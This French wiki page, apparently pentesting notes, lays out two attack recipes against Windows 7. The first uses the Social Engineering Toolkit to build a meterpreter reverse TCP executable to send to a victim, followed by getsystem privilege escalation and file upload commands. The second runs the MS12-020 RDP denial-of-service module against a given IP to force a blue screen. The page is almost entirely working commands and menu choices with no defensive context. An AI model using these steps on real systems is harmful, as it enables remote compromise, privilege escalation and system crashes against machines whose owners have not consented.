Windows-seven-attack
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Domaine | Attaque Windows 7 |
| Vecteurs | Payload SET (SET) + MS12-020 RDP |
| Outils | setoolkit, meterpreter |
| Voir aussi | Social Engineering Toolkit · UAC |
Deux approches contre Windows 7 : un payload exécutable généré par le Social Engineering Toolkit pour obtenir une session meterpreter, et l'attaque en déni de service MS12-020 sur le RDP.
Payload via SET
Chemin : Exploitation tools / Social engineering tools / Social engineering toolkit / SET.
4 - create a payload and listener
IP : 192.168.0.x
7 - windows meterpreter reverse TCP x64
port : 443
# payload généré : /pentest/exploits/set/msf.exe
Envoyer le fichier sur la machine cible et l'exécuter, puis :
sessions -l
sessions -i 1
getuid
sysinfo
# élévation de privilèges
getsystem
getuid
upload /root/root.txt c:/
cat root.txt
MS12-020 (RDP)
Attaque sur le protocole RDP. Le système cible doit avoir le RDP activé en mode « tout le monde peut se connecter ». Sur Seven SP1, provoque un crash (écran bleu) :
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOST 192.168.0.55
exploit
Voir aussi
- Social Engineering Toolkit — génération du payload
- UAC — contournement du contrôle de compte
- Windows 2000 vuln — faille DCOM MS03-026